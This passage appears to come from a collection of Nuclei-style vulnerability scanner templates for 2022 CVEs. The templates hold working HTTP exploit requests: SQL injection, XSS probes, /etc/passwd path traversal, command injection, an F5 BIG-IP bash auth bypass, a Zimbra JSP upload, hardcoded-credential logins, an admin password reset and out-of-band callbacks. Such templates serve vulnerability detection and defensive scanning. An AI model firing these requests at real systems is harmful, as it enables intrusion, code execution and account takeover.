Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-2535","info":{"name":"SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"searchwp-live-search-result\")"],"condition":"and"}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File 